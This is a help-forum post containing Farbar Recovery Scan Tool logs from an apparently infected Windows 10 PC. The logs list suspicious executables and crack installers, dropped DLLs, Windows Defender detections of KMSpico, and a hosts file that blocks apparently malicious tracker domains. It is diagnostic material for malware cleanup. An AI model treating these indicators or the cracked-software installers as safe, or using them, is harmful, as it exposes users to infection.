    2019-02-08 21:26 - 2019-02-08 23:02 - 000000000 ____D C:\Program Files (x86)\Google
    2019-02-08 21:26 - 2019-02-08 21:26 - 001136176 _____ (Google Inc.) C:\Users\Thomazing!\Downloads\ChromeSetup.exe
    2019-02-08 21:24 - 2019-02-08 21:24 - 000000000 ____D C:\Users\Thomazing!\AppData\Local\MicrosoftEdge
    2019-02-07 17:10 - 2019-02-07 17:10 - 000098203 _____ C:\Windows\uninstaller.dat

    ==================== One month (modified) ========

    (If an entry is included in the fixlist, the file/folder will be moved.)

    2019-02-09 13:19 - 2015-07-31 06:42 - 000000000 ____D C:\Windows\rescache
    2019-02-09 13:16 - 2015-07-10 17:47 - 000000000 ____D C:\Windows\system32\Sysprep
    2019-02-09 13:14 - 2015-07-31 06:42 - 000028672 _____ C:\Windows\system32\config\BCD-Template
    2019-02-09 12:51 - 2015-07-31 06:40 - 000000000 ____D C:\Windows\INF
    2019-02-09 12:46 - 2015-07-31 05:52 - 000000006 ____H C:\Windows\Tasks\SA.DAT
    2019-02-09 12:46 - 2015-07-10 17:05 - 000131072 ___SH C:\Windows\system32\config\BBI
    2019-02-09 12:06 - 2015-07-31 06:42 - 000000000 ___HD C:\Windows\ELAMBKUP
    2019-02-09 07:01 - 2015-07-31 06:42 - 000000000 ____D C:\Windows\appcompat
    2019-02-08 23:59 - 2015-09-10 13:44 - 000000000 __RHD C:\Users\Public\AccountPictures
    2019-02-08 22:56 - 2015-07-31 06:25 - 000000000 ____D C:\Windows\CbsTemp
    2019-02-08 22:45 - 2015-07-31 06:42 - 000000000 ___HD C:\Windows\system32\GroupPolicy
    2019-02-08 22:08 - 2015-07-31 05:49 - 000277768 _____ C:\Windows\system32\FNTCACHE.DAT
    2019-02-08 21:46 - 2015-07-31 06:42 - 000000000 ____D C:\Windows\AppReadiness
    2019-02-08 21:39 - 2015-07-31 06:42 - 000000000 ___HD C:\Program Files\WindowsApps
    2019-02-08 21:34 - 2015-07-31 06:42 - 000000000 ____D C:\Program Files\Common Files\microsoft shared
    2019-02-08 21:33 - 2015-09-10 13:21 - 000000000 ____D C:\Windows\ShellNew

    ==================== Files in the root of some directories =======

    2019-02-08 22:11 - 2019-02-09 07:48 - 000000004 _____ () C:\ProgramData\lock.dat
    2019-02-08 21:45 - 2019-02-08 21:45 - 000137168 _____ (Mozilla Foundation) C:\ProgramData\mozglue.dll
    2019-02-08 21:45 - 2019-02-08 21:45 - 000440120 _____ (Microsoft Corporation) C:\ProgramData\msvcp140.dll
    2019-02-08 21:45 - 2019-02-08 21:45 - 001246160 _____ (Mozilla Foundation) C:\ProgramData\nss3.dll
    2019-02-08 22:11 - 2019-02-08 22:11 - 000000008 _____ () C:\ProgramData\ts.dat
    2019-02-08 21:45 - 2019-02-08 21:45 - 000083784 _____ (Microsoft Corporation) C:\ProgramData\vcruntime140.dll
    1601-01-03 21:26 - 1601-01-03 21:26 - 000058368 ____N (Microsoft Corporation) C:\Program Files (x86)\iUOI.exe
    1601-01-03 21:26 - 1601-01-03 21:26 - 000180736 ____N (Microsoft Corporation) C:\Program Files (x86)\OKseaoP.exe
    2019-02-08 22:22 - 2019-02-08 22:22 - 006161408 _____ () C:\Users\Thomazing!\AppData\Local\dump007.dat
    2019-02-08 21:45 - 2019-02-08 21:45 - 000140800 _____ () C:\Users\Thomazing!\AppData\Local\installer.dat
    1601-01-03 21:26 - 1601-01-03 21:26 - 000058368 ____N (Microsoft Corporation) C:\Users\Thomazing!\AppData\Local\IOIiIOa.exe
    2019-02-08 21:47 - 2019-02-08 21:47 - 000000003 _____ () C:\Users\Thomazing!\AppData\Local\wbem.ini

    Some files in TEMP:
    ====================
    2019-02-08 21:46 - 2019-02-08 21:46 - 001527488 _____ (Microsoft Corporation) C:\Users\Thomazing!\AppData\Local\Temp\dbghelp.dll
    2019-02-08 21:44 - 2019-02-08 21:47 - 025260414 _____ (TigerTrade ) C:\Users\Thomazing!\AppData\Local\Temp\ezdyyd.exe
    2019-02-08 21:45 - 2019-02-08 21:46 - 000672090 _____ (FAZ ) C:\Users\Thomazing!\AppData\Local\Temp\global_installer.exe
    2019-02-08 21:44 - 2019-02-08 21:55 - 002892544 _____ (BitTorrent Inc.) C:\Users\Thomazing!\AppData\Local\Temp\IDM_Serial_Number_Crack_Patch_Free_2019_Serial_Keys.exe
    2019-02-08 22:22 - 2019-02-09 08:52 - 000000000 ____D () C:\Users\Thomazing!\AppData\Local\Temp\ImagingEngine.dll
    2019-02-08 21:46 - 2019-02-08 21:46 - 000167616 _____ (Microsoft Corporation) C:\Users\Thomazing!\AppData\Local\Temp\symsrv.dll
    2019-02-08 21:51 - 2019-02-08 21:47 - 000099906 _____ () C:\Users\Thomazing!\AppData\Local\Temp\Uninstall.exe

    ==================== Bamital & volsnap ======================

    (There is no automatic fix for files that do not pass verification.)

    C:\Windows\system32\winlogon.exe => File is digitally signed
    C:\Windows\system32\wininit.exe => File is digitally signed
    C:\Windows\explorer.exe => File is digitally signed
    C:\Windows\SysWOW64\explorer.exe => File is digitally signed
    C:\Windows\system32\svchost.exe => File is digitally signed
    C:\Windows\SysWOW64\svchost.exe => File is digitally signed
    C:\Windows\system32\services.exe => File is digitally signed
    C:\Windows\system32\User32.dll => File is digitally signed
    C:\Windows\SysWOW64\User32.dll => File is digitally signed
    C:\Windows\system32\userinit.exe => File is digitally signed
    C:\Windows\SysWOW64\userinit.exe => File is digitally signed
    C:\Windows\system32\rpcss.dll => File is digitally signed
    C:\Windows\system32\dnsapi.dll => File is digitally signed
    C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
    C:\Windows\system32\dllhost.exe => File is digitally signed
    C:\Windows\SysWOW64\dllhost.exe => File is digitally signed
    C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

    LastRegBack: 2019-02-09 13:15

    ==================== End of FRST.txt ============================

  11. #11
    Join Date
    Jul 2008
    Posts
    232
    Additional scan result of Farbar Recovery Scan Tool (x64) Version: 8.02.2019
    Ran by Thomazing! (10-02-2019 15:26:00)
    Running from C:\Users\Thomazing!\Downloads
    Windows 10 Pro 10240.16487 (X64) (2019-02-09 05:18:42)
    Boot Mode: Normal
    ==========================================================


    ==================== Accounts: =============================

    Administrator (S-1-5-21-3408261874-2140888000-2142219774-500 - Administrator - Disabled)
    DefaultAccount (S-1-5-21-3408261874-2140888000-2142219774-503 - Limited - Disabled)
    Guest (S-1-5-21-3408261874-2140888000-2142219774-501 - Limited - Disabled)
    Thomazing! (S-1-5-21-3408261874-2140888000-2142219774-1001 - Administrator - Enabled) => C:\Users\Thomazing!

    ==================== Security Center ========================

    (If an entry is included in the fixlist, it will be removed.)

    AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
    AV: Malwarebytes (Enabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
    AS: Malwarebytes (Enabled - Up to date) {98619B37-4FC4-67F2-1C99-EEF6D47DBD96}
    AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

    ==================== Installed Programs ======================

    (Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

    µTorrent (HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\uTorrent) (Version: 3.5.5.44994 - BitTorrent Inc.)
    µTorrent (HKU\S-1-5-21-3408261874-2140888000-2142219774-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-02102019152109985\...\uTorrent) (Version: 3.5.5.44994 - BitTorrent Inc.)
    µTorrent (HKU\S-1-5-21-3408261874-2140888000-2142219774-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-02102019152308407\...\uTorrent) (Version: 3.5.5.44994 - BitTorrent Inc.)
    Alien Team (HKLM-x32\...\{52811919-39BB-4C90-95A6-323FA6636B29}_is1) (Version: 1 - Alien Team)
    CCleaner (HKLM\...\CCleaner) (Version: 5.52 - Piriform)
    Google Chrome (HKLM-x32\...\Google Chrome) (Version: 72.0.3626.96 - Google Inc.)
    Google Toolbar for Internet Explorer (HKLM-x32\...\{18455581-E099-4BA8-BC6B-F34B2F06600C}) (Version: 1.0.0 - Google Inc.) Hidden
    Google Toolbar for Internet Explorer (HKLM-x32\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.8231.2252 - Google Inc.)
    Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.23 - Google Inc.) Hidden
    IDM Crack 6.25 build 20 (HKLM-x32\...\IDM Crack 6.25 build 20) (Version: build 21 - Crackingpatching.com Team)
    Internet Download Manager (HKLM-x32\...\Internet Download Manager) (Version: - Tonec Inc.)
    Malwarebytes version 3.7.1.2839 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.7.1.2839 - Malwarebytes)
    Microsoft Office Professional Plus 2010 (HKLM-x32\...\Office14.PROPLUSR) (Version: 14.0.4763.1000 - Microsoft Corporation)
    RogueKiller version 13.1.4.0 (HKLM\...\8B3D7924-ED89-486B-8322-E8594065D5CB_is1) (Version: 13.1.4.0 - Adlice Software)
    Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 17.0.10.51 - Synaptics Incorporated)
    VLC media player (HKLM\...\VLC media player) (Version: 3.0.6 - VideoLAN)
    WinRAR 5.70 beta 1 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.70.1 - win.rar GmbH)

    ==================== Custom CLSID (Whitelisted): ==========================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    ShellIconOverlayIdentifiers: [ IDM Shell Extension] -> {CDC95B92-E27C-4745-A8C5-64A52A78855D} => C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll [2015-08-14] (Tonec Inc. -> Tonec Inc.)
    ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2019-01-28] (win.rar GmbH -> Alexander Roshal)
    ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2019-01-28] (win.rar GmbH -> Alexander Roshal)
    ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2019-02-01] (Malwarebytes Corporation -> Malwarebytes)
    ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2019-02-01] (Malwarebytes Corporation -> Malwarebytes)
    ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2019-01-28] (win.rar GmbH -> Alexander Roshal)
    ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2019-01-28] (win.rar GmbH -> Alexander Roshal)

    ==================== Scheduled Tasks (Whitelisted) =============

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    Task: {25681BAB-9719-40FC-87F6-A290829EB501} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2019-01-10] (Piriform Software Ltd -> Piriform Software Ltd)
    Task: {71E02E5A-83AD-4151-B826-04CEFE0C7B32} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2019-02-08] (Google Inc -> Google Inc.)
    Task: {9EF0F8A1-4CFA-45BB-8959-8C5455003D37} - System32\Tasks\Synaptics TouchPad Enhancements => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2019-02-08] (Synaptics Incorporated -> Synaptics Incorporated)
    Task: {E311046B-4383-410D-B613-3788683CA329} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2019-02-08] (Google Inc -> Google Inc.)
    Task: {EB684CE2-5E4F-4692-B7BC-796F32D5014C} - System32\Tasks\CCleaner Update => C:\Program Files\CCleaner\CCUpdate.exe [2019-02-08] (Piriform Software Ltd -> Piriform Software Ltd)
    Task: {FC33DBE7-C910-4F1C-B383-007FD7E6ABC7} - System32\Tasks\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser => %windir%\system32\rundll32.exe generaltel.dll,RunTelemetryW

    (If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)


    ==================== Shortcuts & WMI ========================

    (The entries could be listed to be restored or removed.)


    ==================== Loaded Modules (Whitelisted) ==============

    2015-09-10 13:08 - 2015-09-10 13:08 - 000032768 _____ () C:\Windows\SYSTEM32\licensemanagerapi.dll
    2015-09-10 13:08 - 2015-09-10 13:08 - 000404480 _____ () C:\Windows\System32\diagtrack_wininternal.dll
    2015-09-10 13:08 - 2015-09-10 13:08 - 002498808 _____ () C:\Windows\system32\CoreUIComponents.dll
    2015-07-10 11:19 - 2015-07-10 11:19 - 000429056 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
    2015-09-10 13:08 - 2015-09-10 13:08 - 006569472 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
    2015-07-10 11:13 - 2015-09-10 13:08 - 000471040 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
    2015-09-10 13:08 - 2015-09-10 13:08 - 001808384 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
    2015-09-10 13:08 - 2015-09-10 13:08 - 002274816 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
    2019-02-08 23:02 - 2019-02-06 10:00 - 005186032 _____ () C:\Program Files (x86)\Google\Chrome\Application\72.0.3626.96\libglesv2.dll
    2019-02-08 23:02 - 2019-02-06 10:00 - 000117232 _____ () C:\Program Files (x86)\Google\Chrome\Application\72.0.3626.96\libegl.dll

    ==================== Alternate Data Streams (Whitelisted) =========

    (If an entry is included in the fixlist, only the ADS will be removed.)


    ==================== Safe Mode (Whitelisted) ===================

    (If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"

    ==================== Association (Whitelisted) ===============

    (If an entry is included in the fixlist, the registry item will be restored to default or removed.)


    ==================== Internet Explorer trusted/restricted ===============

    (If an entry is included in the fixlist, it will be removed from the registry.)


    ==================== Hosts content: ==========================

    (If needed Hosts: directive could be included in the fixlist to reset Hosts.)

    2015-07-31 06:42 - 2019-02-08 21:46 - 002097392 _____ C:\Windows\system32\drivers\etc\hosts

    127.0.0.1 space1.adminpressure.space
    127.0.0.1 trackpressure.website
    127.0.0.1 htagzdownload.pw
    127.0.0.1 texttotalk.org
    127.0.0.1 360devtraking.website
    127.0.0.1 room1.360dev.info
    127.0.0.1 djapp.info
    127.0.0.1 technologievimy.com

    ==================== Other Areas ============================

    (Currently there is no automatic fix for this section.)

    HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\Control Panel\Desktop\\Wallpaper ->
    HKU\S-1-5-21-3408261874-2140888000-2142219774-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-02102019152109985\Control Panel\Desktop\\Wallpaper ->
    HKU\S-1-5-21-3408261874-2140888000-2142219774-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-02102019152308407\Control Panel\Desktop\\Wallpaper ->
    DNS Servers: 192.168.1.1
    HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
    HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: Off)
    Windows Firewall is enabled.

    ==================== MSCONFIG/TASK MANAGER disabled items ==

    If an entry is included in the fixlist, it will be removed.

    HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\StartupApproved\Run: => "IDMan"
    HKU\S-1-5-21-3408261874-2140888000-2142219774-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-02102019152109985\...\StartupApproved\Run: => "IDMan"
    HKU\S-1-5-21-3408261874-2140888000-2142219774-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-02102019152308407\...\StartupApproved\Run: => "IDMan"

    ==================== FirewallRules (Whitelisted) ===============

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    FirewallRules: [{34014409-F047-4511-8A51-E0086652B848}] => (Allow) C:\Users\Thomazing!\AppData\Roaming\uTorrent\uTorrent.exe (BitTorrent Inc -> BitTorrent Inc.)
    FirewallRules: [{EE26B7B5-4F57-4DB5-8AAD-A1A7AEEA5CF8}] => (Allow) C:\Users\Thomazing!\AppData\Roaming\uTorrent\uTorrent.exe (BitTorrent Inc -> BitTorrent Inc.)
    FirewallRules: [{76CDF517-F312-44A8-B7D6-E74702BA4382}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
    FirewallRules: [{3F615D37-89C0-45E6-842F-5EB82ECD2C76}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
    FirewallRules: [{D3020994-C154-42F4-93AA-C0B3C54504AB}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
    FirewallRules: [{1DE617D9-CAAF-4865-88CC-8B52F2C6CE8C}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
    FirewallRules: [{47792053-3338-4A6F-AE9E-447B51B4287A}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
    FirewallRules: [{0A843646-B083-4688-8D3B-A42EB241BEAF}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
    FirewallRules: [{9A85637C-ABF5-4BC7-8DBF-AEAC9B50890A}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
    FirewallRules: [{4F5E25DC-8146-46D7-B3C7-DAEBA3A90326}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
    FirewallRules: [{2B39C486-2C5E-45FF-B698-F6C65CB96345}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
    FirewallRules: [{456C25A6-8A05-4EC5-B99F-03BA6956BF72}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google Inc.)
    FirewallRules: [{92C0DFAF-0F89-4F63-A042-BBB6C7AEAE3C}] => (Allow) C:\Program Files\CCleaner\CCUpdate.exe (Piriform Software Ltd -> Piriform Software Ltd)
    FirewallRules: [{D453C330-AB73-4D2F-AEDC-5ACC2FECD2EF}] => (Allow) C:\Program Files\CCleaner\CCUpdate.exe (Piriform Software Ltd -> Piriform Software Ltd)
    FirewallRules: [{76C2B05D-59C7-4F00-A6FA-E3B3EC26DF57}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
    FirewallRules: [{A5393F9A-F08B-4AF7-8E8A-5552C87EB8A1}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
    FirewallRules: [{6A332DC7-031B-46F5-8EE9-4BC596EEC559}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
    FirewallRules: [{1EA56DA0-0D98-40D4-9415-02849C00A304}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
    FirewallRules: [{12C02EC4-E8CB-4E17-9AE1-270A47450D88}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
    FirewallRules: [{38643855-9433-404F-AB1A-5BA1486C3091}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
    FirewallRules: [{06C0CE62-896B-4B0A-8B9C-E0E60278B93A}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
    FirewallRules: [{1FDF2492-B639-4E70-BF09-CD0BA8C38671}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
    FirewallRules: [{58AFFE55-6861-4937-A48E-10153B97E5A0}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
    FirewallRules: [{ED6ABB3C-84FE-452A-AAB0-92ADAB765B5A}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
    FirewallRules: [{7DA9684C-3EDF-473F-BE47-0ADBD2E127DC}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
    FirewallRules: [{E43D8A77-66E2-47FF-AB3B-01927D6F878D}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)

    ==================== Restore Points =========================

    ATTENTION: System Restore is disabled

    ==================== Faulty Device Manager Devices =============


    ==================== Event log errors: =========================

    Application errors:
    ==================
    Error: (02/09/2019 10:34:47 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-OHFLJFD)
    Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.

    Error: (02/09/2019 08:39:51 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-OHFLJFD)
    Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.

    Error: (02/09/2019 08:37:22 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-OHFLJFD)
    Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.

    Error: (02/09/2019 07:29:04 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-OHFLJFD)
    Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.

    Error: (02/09/2019 07:03:34 AM) (Source: Application Error) (EventID: 1000) (User: )
    Description: Faulting application name: cloudnet.exe, version: 7.2.1.1, time stamp: 0x5c5df16a
    Faulting module name: KERNELBASE.dll, version: 10.0.10240.16384, time stamp: 0x559f3b2a
    Exception code: 0xc0000005
    Fault offset: 0x000ffc62
    Faulting process id: 0x2648
    Faulting application start time: 0x01d4c002846509ab
    Faulting application path: C:\Users\Thomazing!\AppData\Local\Temp\csrss\cloudnet.exe
    Faulting module path: C:\Windows\SYSTEM32\KERNELBASE.dll
    Report Id: 005d774b-7636-4cd7-a6d7-93e91613f789
    Faulting package full name:
    Faulting package-relative application ID:

    Error: (02/09/2019 01:24:26 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-OHFLJFD)
    Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.

    Error: (02/09/2019 01:22:58 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-OHFLJFD)
    Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.

    Error: (02/09/2019 12:44:21 AM) (Source: MsiInstaller) (EventID: 11327) (User: DESKTOP-OHFLJFD)
    Description: Product: Microsoft.NET -- Error 1327. Invalid drive: G:\


    System errors:
    =============
    Error: (02/09/2019 03:59:54 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
    Description: The Sync Host_Session2 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.

    Error: (02/09/2019 01:05:01 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-OHFLJFD)
    Description: The server {9BA05972-F6A8-11CF-A442-00A0C90A8F39} did not register with DCOM within the required timeout.

    Error: (02/09/2019 01:04:59 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
    Description: The Sync Host_Session1 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.

    Error: (02/09/2019 12:46:24 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-OHFLJFD)
    Description: The server {9BA05972-F6A8-11CF-A442-00A0C90A8F39} did not register with DCOM within the required timeout.

    Error: (02/09/2019 12:46:23 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
    Description: The Sync Host_Session1 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.

    Error: (02/09/2019 12:46:18 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
    Description: The Office Software Protection Platform service terminated unexpectedly. It has done this 1 time(s).

    Error: (02/09/2019 12:22:47 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
    Description: The Sync Host_Session2 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.

    Error: (02/09/2019 12:20:40 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
    Description: A fatal alert was generated and sent to the remote endpoint. This may result in termination of the connection. The TLS protocol defined fatal error code is 10. The Windows SChannel error state is 10.


    Windows Defender:
    ===================================
    Date: 2019-02-08 22:58:52.037
    Description:
    Windows Defender has detected malware or other potentially unwanted software.
    For more information please see the following:
    http://go.microsoft.com/fwlink/?link...0&enterprise=0
    Name: HackTool:Win32/AutoKMS
    ID: 2147685180
    Severity: Medium
    Category: Tool
    Path: file:_C:\Users\Thomazing!\AppData\Local\Temp\Rar$EXa15208.40575\Gold_Snake_Portable_v10.1.8\KMSpico Portable\cert\installAll.cmd
    Detection Origin: Local machine
    Detection Type: Concrete
    Detection Source: System
    Process Name: Unknown
    Signature Version: AV: 1.199.1615.0, AS: 1.199.1615.0, NIS: 114.1.0.0
    Engine Version: AM: 1.1.11701.0, NIS: 2.1.11502.0

    Date: 2019-02-08 22:28:36.285
    Description:
    Windows Defender has detected malware or other potentially unwanted software.
    For more information please see the following:
    http://go.microsoft.com/fwlink/?link...0&enterprise=0
    Name: HackTool:Win32/AutoKMS
    ID: 2147685180
    Severity: Medium
    Category: Tool
    Path: file:_C:\Users\Thomazing!\AppData\Local\Temp\Rar$EXa15208.40575\Gold_Snake_Portable_v10.1.8\KMSpico Portable\cert\installAll.cmd
    Detection Origin: Local machine
    Detection Type: Concrete
    Detection Source: System
    Process Name: Unknown
    Signature Version: AV: 1.199.1615.0, AS: 1.199.1615.0, NIS: 114.1.0.0
    Engine Version: AM: 1.1.11701.0, NIS: 2.1.11502.0

    Date: 2019-02-08 22:22:31.668
    Description:
    Windows Defender has detected malware or other potentially unwanted software.
    For more information please see the following:
    http://go.microsoft.com/fwlink/?link...0&enterprise=0
    Name: HackTool:Win32/AutoKMS
    ID: 2147685180
    Severity: Medium
    Category: Tool
    Path: file:_C:\Users\Thomazing!\AppData\Local\Temp\Rar$EXa15208.40575\Gold_Snake_Portable_v10.1.8\KMSpico Portable\cert\installAll.cmd
    Detection Origin: Local machine
    Detection Type: Concrete
    Detection Source: System
    Process Name: Unknown
    Signature Version: AV: 1.199.1615.0, AS: 1.199.1615.0, NIS: 114.1.0.0
    Engine Version: AM: 1.1.11701.0, NIS: 2.1.11502.0

    Date: 2019-02-08 22:08:55.987
    Description:
    Windows Defender has detected malware or other potentially unwanted software.
    For more information please see the following:
    http://go.microsoft.com/fwlink/?link...0&enterprise=0
    Name: HackTool:Win32/AutoKMS
    ID: 2147685180
    Severity: Medium
    Category: Tool
    Path: file:_C:\Users\Thomazing!\AppData\Local\Temp\Rar$EXa15208.40575\Gold_Snake_Portable_v10.1.8\KMSpico Portable\cert\installAll.cmd
    Detection Origin: Local machine
    Detection Type: Concrete
    Detection Source: System
    Process Name: Unknown
    Signature Version: AV: 1.199.1615.0, AS: 1.199.1615.0, NIS: 114.1.0.0
    Engine Version: AM: 1.1.11701.0, NIS: 2.1.11502.0

    Date: 2019-02-08 22:00:18.323
    Description:
    Windows Defender has detected malware or other potentially unwanted software.
    For more information please see the following:
    http://go.microsoft.com/fwlink/?link...0&enterprise=0
    Name: HackTool:Win32/AutoKMS
    ID: 2147685180
    Severity: Medium
    Category: Tool
    Path: file:_C:\Users\Thomazing!\AppData\Local\Temp\Rar$EXa15208.40575\Gold_Snake_Portable_v10.1.8\KMSpico Portable\cert\installAll.cmd;file:_D:\Thomas' Backup (1-22-16)\Thomas Entena\Documents\Set-Up\windows 10\Gold_Snake_Portable_v10.1.8\KMSpico Portable\cert\installAll.cmd
    Detection Origin: Local machine
    Detection Type: Concrete
    Detection Source: Real-Time Protection
